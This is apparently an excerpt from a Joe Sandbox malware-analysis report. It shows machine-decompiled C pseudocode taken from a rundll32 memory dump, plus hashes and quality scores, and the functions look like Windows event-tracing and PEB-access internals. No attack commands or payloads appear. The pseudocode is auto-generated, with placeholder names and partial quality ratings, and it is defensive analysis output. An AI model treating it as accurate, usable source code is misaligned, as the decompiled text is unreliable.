                                                                                                                • Instruction ID: 3fcc7ea9add954e533a9708dbea6064ecb014a9337b340da1664fbf382a4d25e
                                                                                                                • Opcode Fuzzy Hash: 427b3a889518acaa2838bf5a2264d278621fc309981741a8a18fe92ea2524cb9
                                                                                                                • Instruction Fuzzy Hash: 050184722015557FEB11BB6ACE80E13B7ACFB45668B00062BB60887A12CB74FC11C6E5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 61%
                                                                                                                			E044C14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				short _v54;
                                                                                                                				char _v60;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed char* _t21;
                                                                                                                				intOrPtr _t27;
                                                                                                                				intOrPtr _t33;
                                                                                                                				intOrPtr _t34;
                                                                                                                				signed int _t35;
                                                                                                                
                                                                                                                				_t32 = __edx;
                                                                                                                				_t27 = __ebx;
                                                                                                                				_v8 =  *0x44fd360 ^ _t35;
                                                                                                                				_t33 = __edx;
                                                                                                                				_t34 = __ecx;
                                                                                                                				E0444FA60( &_v60, 0, 0x30);
                                                                                                                				_v20 = _a4;
                                                                                                                				_v16 = _a8;
                                                                                                                				_v28 = _t34;
                                                                                                                				_v24 = _t33;
                                                                                                                				_v54 = 0x1034;
                                                                                                                				if(E04427D50() == 0) {
                                                                                                                					_t21 = 0x7ffe0388;
                                                                                                                				} else {
                                                                                                                					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                				}
                                                                                                                				_push( &_v60);
                                                                                                                				_push(0x10);
                                                                                                                				_push(0x20402);
                                                                                                                				_push( *_t21 & 0x000000ff);
                                                                                                                				return E0444B640(E04449AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                			}


















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1847eb290a37fe914eec08d59b653169fd9078039398c37e4d23d4ca0b921cfb
                                                                                                                • Instruction ID: 531b35f1bd6244f06f751876e04c2bfb4340916e31a00b3dea628cf086eb98e8
                                                                                                                • Opcode Fuzzy Hash: 1847eb290a37fe914eec08d59b653169fd9078039398c37e4d23d4ca0b921cfb
                                                                                                                • Instruction Fuzzy Hash: F6019271A00258AFEF10DF69D841EAEB7B8EF44700F40405BF905EB381DA74EA00CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 61%
                                                                                                                			E044C138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				short _v54;
                                                                                                                				char _v60;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed char* _t21;
                                                                                                                				intOrPtr _t27;
                                                                                                                				intOrPtr _t33;
                                                                                                                				intOrPtr _t34;
                                                                                                                				signed int _t35;
                                                                                                                
                                                                                                                				_t32 = __edx;
                                                                                                                				_t27 = __ebx;
                                                                                                                				_v8 =  *0x44fd360 ^ _t35;
                                                                                                                				_t33 = __edx;
                                                                                                                				_t34 = __ecx;
                                                                                                                				E0444FA60( &_v60, 0, 0x30);
                                                                                                                				_v20 = _a4;
                                                                                                                				_v16 = _a8;
                                                                                                                				_v28 = _t34;
                                                                                                                				_v24 = _t33;
                                                                                                                				_v54 = 0x1033;
                                                                                                                				if(E04427D50() == 0) {
                                                                                                                					_t21 = 0x7ffe0388;
                                                                                                                				} else {
                                                                                                                					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                				}
                                                                                                                				_push( &_v60);
                                                                                                                				_push(0x10);
                                                                                                                				_push(0x20402);
                                                                                                                				_push( *_t21 & 0x000000ff);
                                                                                                                				return E0444B640(E04449AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                			}


















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3dcaaf6c3c843107f118cb07629b538ae5816a05aedaab7396680885e9d7e612
                                                                                                                • Instruction ID: 33d6fb1111cde9b48f280036b982dbaaed203d2864124b8b728ca84fbbc1bcd5
                                                                                                                • Opcode Fuzzy Hash: 3dcaaf6c3c843107f118cb07629b538ae5816a05aedaab7396680885e9d7e612
                                                                                                                • Instruction Fuzzy Hash: 71014071A00258ABEF14DFA9D881EAEB7B8EF44714F44405BB905AB281DA74AA01CB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E044058EC(intOrPtr __ecx) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v28;
                                                                                                                				char _v44;
                                                                                                                				char _v76;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr _t10;
                                                                                                                				intOrPtr _t16;
                                                                                                                				intOrPtr _t17;
                                                                                                                				intOrPtr _t27;
                                                                                                                				intOrPtr _t28;
                                                                                                                				signed int _t29;
                                                                                                                
                                                                                                                				_v8 =  *0x44fd360 ^ _t29;
                                                                                                                				_t10 =  *[fs:0x30];
                                                                                                                				_t27 = __ecx;
                                                                                                                				if(_t10 == 0) {
                                                                                                                					L6:
                                                                                                                					_t28 = 0x43e5c80;
                                                                                                                				} else {
                                                                                                                					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                                                                                                					if(_t16 == 0) {
                                                                                                                						goto L6;
                                                                                                                					} else {
                                                                                                                						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if(E04405943() != 0 &&  *0x44f5320 > 5) {
                                                                                                                					E04487B5E( &_v44, _t27);
                                                                                                                					_t22 =  &_v28;
                                                                                                                					E04487B5E( &_v28, _t28);
                                                                                                                					_t11 = E04487B9C(0x44f5320, 0x43ebf15,  &_v28, _t22, 4,  &_v76);
                                                                                                                				}
                                                                                                                				return E0444B640(_t11, _t17, _v8 ^ _t29, 0x43ebf15, _t27, _t28);
                                                                                                                 			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                 • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 80570f3a69040764dee9f8b7213a6a3baf9151dd2153bb676dfd5c09b9ab1cf7
                                                                                                                • Instruction ID: 8ca905fec45a2e39c77a05cbf4c5bdb2ef71597916baf914d2c543d4c5099495
                                                                                                                • Opcode Fuzzy Hash: 80570f3a69040764dee9f8b7213a6a3baf9151dd2153bb676dfd5c09b9ab1cf7
                                                                                                                • Instruction Fuzzy Hash: 4201A731B00114BBEF14EA6ADC119BF77A9EF80238F94407F9905A7291EE30FD12CA55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 59%
                                                                                                                			E044BFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                                				signed int _v12;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				short _v58;
                                                                                                                				char _v64;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed char* _t18;
                                                                                                                				intOrPtr _t24;
                                                                                                                				intOrPtr _t30;
                                                                                                                				intOrPtr _t31;
                                                                                                                				signed int _t32;
                                                                                                                
                                                                                                                				_t29 = __edx;
                                                                                                                				_t24 = __ebx;
                                                                                                                				_v12 =  *0x44fd360 ^ _t32;
                                                                                                                				_t30 = __edx;
                                                                                                                				_t31 = __ecx;
                                                                                                                				E0444FA60( &_v64, 0, 0x30);
                                                                                                                				_v24 = _a4;
                                                                                                                				_v32 = _t31;
                                                                                                                				_v28 = _t30;
                                                                                                                				_v58 = 0x267;
                                                                                                                				if(E04427D50() == 0) {
                                                                                                                					_t18 = 0x7ffe0388;
                                                                                                                				} else {
                                                                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                				}
                                                                                                                				_push( &_v64);
                                                                                                                				_push(0x10);
                                                                                                                				_push(0x20402);
                                                                                                                				_push( *_t18 & 0x000000ff);
                                                                                                                				return E0444B640(E04449AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                                                                                 			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                 • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4d653872944dfb64f4152e8513be1eb4bacc3ed3e441a872c229242e9943005b
                                                                                                                • Instruction ID: e396885505616f0d4caf25945fbb3f5716a1c3c5df4b67d2c85d13a98899325f
                                                                                                                • Opcode Fuzzy Hash: 4d653872944dfb64f4152e8513be1eb4bacc3ed3e441a872c229242e9943005b
                                                                                                                • Instruction Fuzzy Hash: EA017171E00258ABEF14DBA9D845FAEB7B8EF84704F00406BB904EB281DA74A901C7A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 59%
                                                                                                                			E044BFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                                				signed int _v12;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				short _v58;
                                                                                                                				char _v64;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed char* _t18;
                                                                                                                				intOrPtr _t24;
                                                                                                                				intOrPtr _t30;
                                                                                                                				intOrPtr _t31;
                                                                                                                				signed int _t32;
                                                                                                                
                                                                                                                				_t29 = __edx;
                                                                                                                				_t24 = __ebx;
                                                                                                                				_v12 =  *0x44fd360 ^ _t32;
                                                                                                                				_t30 = __edx;
                                                                                                                				_t31 = __ecx;
                                                                                                                				E0444FA60( &_v64, 0, 0x30);
                                                                                                                				_v24 = _a4;
                                                                                                                				_v32 = _t31;
                                                                                                                				_v28 = _t30;
                                                                                                                				_v58 = 0x266;
                                                                                                                				if(E04427D50() == 0) {
                                                                                                                					_t18 = 0x7ffe0388;
                                                                                                                				} else {
                                                                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                				}
                                                                                                                				_push( &_v64);
                                                                                                                				_push(0x10);
                                                                                                                				_push(0x20402);
                                                                                                                				_push( *_t18 & 0x000000ff);
                                                                                                                				return E0444B640(E04449AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                                                                                 			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                 • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 89f8df82428b063d8de9ec0052588740eb95985b73ed5b5a6c8210e5d558d50f
                                                                                                                • Instruction ID: e03e70330a83b7d7b97b8144fd173d8acda7cf49db78dc395db7ec7c4c607d37
                                                                                                                • Opcode Fuzzy Hash: 89f8df82428b063d8de9ec0052588740eb95985b73ed5b5a6c8210e5d558d50f
                                                                                                                • Instruction Fuzzy Hash: A7018871E00258ABEF14DBA9D845FAFB7B8EF44704F40406BB905EB381D974EA11C795
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E044D1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                				char _v8;
                                                                                                                				void* _v11;
                                                                                                                				unsigned int _v12;
                                                                                                                				void* _v15;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				char* _t16;
                                                                                                                				signed int* _t35;
                                                                                                                
                                                                                                                				_t22 = __ebx;
                                                                                                                				_t35 = __ecx;
                                                                                                                				_v8 = __edx;
                                                                                                                				_t13 =  !( *__ecx) + 1;
                                                                                                                				_v12 =  !( *__ecx) + 1;
                                                                                                                				if(_a4 != 0) {
                                                                                                                					E044D165E(__ebx, 0x44f8ae4, (__edx -  *0x44f8b04 >> 0x14) + (__edx -  *0x44f8b04 >> 0x14), __edi, __ecx, (__edx -  *0x44f8b04 >> 0x14) + (__edx -  *0x44f8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                                                                                                				}
                                                                                                                				E044CAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                                                                                                				if(E04427D50() == 0) {
                                                                                                                					_t16 = 0x7ffe0388;
                                                                                                                				} else {
                                                                                                                					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                				}
                                                                                                                				if( *_t16 != 0) {
                                                                                                                					_t16 = E044BFE3F(_t22, _t35, _v8, _v12);
                                                                                                                				}
                                                                                                                				return _t16;
                                                                                                                 			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b5bc844c84e238c121d05ce5ff9421c667dc0fb44f903de9e4849554c0590b1f
                                                                                                                • Instruction ID: 5b6ae4f76855211f2931d118d22b12b9ccadd8321b5b2145f25afdff56acd6e0
                                                                                                                • Opcode Fuzzy Hash: b5bc844c84e238c121d05ce5ff9421c667dc0fb44f903de9e4849554c0590b1f
                                                                                                                • Instruction Fuzzy Hash: 3A01F1726047419BEB12EB69C944B1A77E5AB84314F04862BF88697691EE34E840CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0441B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                                                                                                				signed char _t11;
                                                                                                                				signed char* _t12;
                                                                                                                				intOrPtr _t24;
                                                                                                                				signed short* _t25;
                                                                                                                
                                                                                                                				_t25 = __edx;
                                                                                                                				_t24 = __ecx;
                                                                                                                				_t11 = ( *[fs:0x30])[0x50];
                                                                                                                				if(_t11 != 0) {
                                                                                                                					if( *_t11 == 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                                                					L2:
                                                                                                                					if( *_t12 != 0) {
                                                                                                                						_t12 =  *[fs:0x30];
                                                                                                                						if((_t12[0x240] & 0x00000004) == 0) {
                                                                                                                							goto L3;
                                                                                                                						}
                                                                                                                						if(E04427D50() == 0) {
                                                                                                                							_t12 = 0x7ffe0385;
                                                                                                                						} else {
                                                                                                                							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                                                						}
                                                                                                                						if(( *_t12 & 0x00000020) == 0) {
                                                                                                                							goto L3;
                                                                                                                						}
                                                                                                                						return E04487016(_a4, _t24, 0, 0, _t25, 0);
                                                                                                                					}
                                                                                                                					L3:
                                                                                                                					return _t12;
                                                                                                                				}
                                                                                                                				L1:
                                                                                                                				_t12 = 0x7ffe0384;
                                                                                                                				goto L2;
                                                                                                                			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                • Instruction ID: 9885903864705369e1a5066455eb2e4e2d201a63147fe14d708e5adc518c73e8
                                                                                                                • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                • Instruction Fuzzy Hash: 960171313009C09FDB22CB5DC944F677BD8EB46754F0940A6F915DB762D628FC41C621
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 54%
                                                                                                                			E044D8ED6(intOrPtr __ecx, intOrPtr __edx) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				short _v62;
                                                                                                                				char _v68;
                                                                                                                				signed char* _t29;
                                                                                                                				intOrPtr _t35;
                                                                                                                				intOrPtr _t41;
                                                                                                                				intOrPtr _t42;
                                                                                                                				signed int _t43;
                                                                                                                
                                                                                                                				_t40 = __edx;
                                                                                                                				_v8 =  *0x44fd360 ^ _t43;
                                                                                                                				_v28 = __ecx;
                                                                                                                				_v62 = 0x1c2a;
                                                                                                                				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                                                                                                				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                                                                                                				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                                                                                                				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                                                                                                				_v24 = __edx;
                                                                                                                				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                                                                                                				if(E04427D50() == 0) {
                                                                                                                					_t29 = 0x7ffe0386;
                                                                                                                				} else {
                                                                                                                					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                				}
                                                                                                                				_push( &_v68);
                                                                                                                				_push(0x1c);
                                                                                                                				_push(0x20402);
                                                                                                                				_push( *_t29 & 0x000000ff);
                                                                                                                				return E0444B640(E04449AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                                                                                                			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2dd9b660dbccb99e78efb487e406c46778d76b4130dc6cd4e96cdbb72e8b986a
                                                                                                                • Instruction ID: 71388940ed59b1c47aaa4bcff6d9dbfa0326862ac90c078dfcbaa6059f95d73b
                                                                                                                • Opcode Fuzzy Hash: 2dd9b660dbccb99e78efb487e406c46778d76b4130dc6cd4e96cdbb72e8b986a
                                                                                                                • Instruction Fuzzy Hash: B7111E70E002599FEB04DFA9D541BAEB7F4FF08300F0442AAE519EB782E634A940CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 54%
                                                                                                                			E044D8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				signed int _v12;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v40;
                                                                                                                				short _v66;
                                                                                                                				char _v72;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed char* _t18;
                                                                                                                				signed int _t32;
                                                                                                                
                                                                                                                				_t29 = __edx;
                                                                                                                				_v12 =  *0x44fd360 ^ _t32;
                                                                                                                				_t31 = _a8;
                                                                                                                				_t30 = _a12;
                                                                                                                				_v66 = 0x1c20;
                                                                                                                				_v40 = __ecx;
                                                                                                                				_v36 = __edx;
                                                                                                                				_v32 = _a4;
                                                                                                                				_v28 = _a8;
                                                                                                                				_v24 = _a12;
                                                                                                                				if(E04427D50() == 0) {
                                                                                                                					_t18 = 0x7ffe0386;
                                                                                                                				} else {
                                                                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                				}
                                                                                                                				_push( &_v72);
                                                                                                                				_push(0x14);
                                                                                                                				_push(0x20402);
                                                                                                                				_push( *_t18 & 0x000000ff);
                                                                                                                				return E0444B640(E04449AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                                                                                                			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0440DB60(signed int __ecx) {
                                                                                                                				intOrPtr* _t9;
                                                                                                                				void* _t12;
                                                                                                                				void* _t13;
                                                                                                                				intOrPtr _t14;
                                                                                                                
                                                                                                                				_t9 = __ecx;
                                                                                                                				_t14 = 0;
                                                                                                                				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                                                                                                					_t13 = 0xc000000d;
                                                                                                                				} else {
                                                                                                                					_t14 = E0440DB40();
                                                                                                                					if(_t14 == 0) {
                                                                                                                						_t13 = 0xc0000017;
                                                                                                                					} else {
                                                                                                                						_t13 = E0440E7B0(__ecx, _t12, _t14, 0xfff);
                                                                                                                						if(_t13 < 0) {
                                                                                                                							L0440E8B0(__ecx, _t14, 0xfff);
                                                                                                                							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                                                                                                							_t14 = 0;
                                                                                                                						} else {
                                                                                                                							_t13 = 0;
                                                                                                                							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *_t9 = _t14;
                                                                                                                				return _t13;
                                                                                                                			}








                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0440B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                                                                                                				signed char* _t13;
                                                                                                                				intOrPtr _t22;
                                                                                                                				char _t23;
                                                                                                                
                                                                                                                				_t23 = __edx;
                                                                                                                				_t22 = __ecx;
                                                                                                                				if(E04427D50() != 0) {
                                                                                                                					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                                                				} else {
                                                                                                                					_t13 = 0x7ffe0384;
                                                                                                                				}
                                                                                                                				if( *_t13 != 0) {
                                                                                                                					_t13 =  *[fs:0x30];
                                                                                                                					if((_t13[0x240] & 0x00000004) == 0) {
                                                                                                                						goto L3;
                                                                                                                					}
                                                                                                                					if(E04427D50() == 0) {
                                                                                                                						_t13 = 0x7ffe0385;
                                                                                                                					} else {
                                                                                                                						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                                                					}
                                                                                                                					if(( *_t13 & 0x00000020) == 0) {
                                                                                                                						goto L3;
                                                                                                                					}
                                                                                                                					return E04487016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                                                                                                				} else {
                                                                                                                					L3:
                                                                                                                					return _t13;
                                                                                                                				}
                                                                                                                			}







                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp

                                                                                                                C-Code - Quality: 46%
                                                                                                                			E0449FE87(intOrPtr __ecx) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				short _v54;
                                                                                                                				char _v60;
                                                                                                                				signed char* _t21;
                                                                                                                				intOrPtr _t27;
                                                                                                                				intOrPtr _t32;
                                                                                                                				intOrPtr _t33;
                                                                                                                				intOrPtr _t34;
                                                                                                                				signed int _t35;
                                                                                                                
                                                                                                                				_v8 =  *0x44fd360 ^ _t35;
                                                                                                                				_v16 = __ecx;
                                                                                                                				_v54 = 0x1722;
                                                                                                                				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                                                                                                				_v28 =  *((intOrPtr*)(__ecx + 4));
                                                                                                                				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                                                                                                				if(E04427D50() == 0) {
                                                                                                                					_t21 = 0x7ffe0382;
                                                                                                                				} else {
                                                                                                                					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                                                                                                				}
                                                                                                                				_push( &_v60);
                                                                                                                				_push(0x10);
                                                                                                                				_push(0x20402);
                                                                                                                				_push( *_t21 & 0x000000ff);
                                                                                                                				return E0444B640(E04449AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                			}

















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp

                                                                                                                C-Code - Quality: 48%
                                                                                                                			E044D8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _v16;
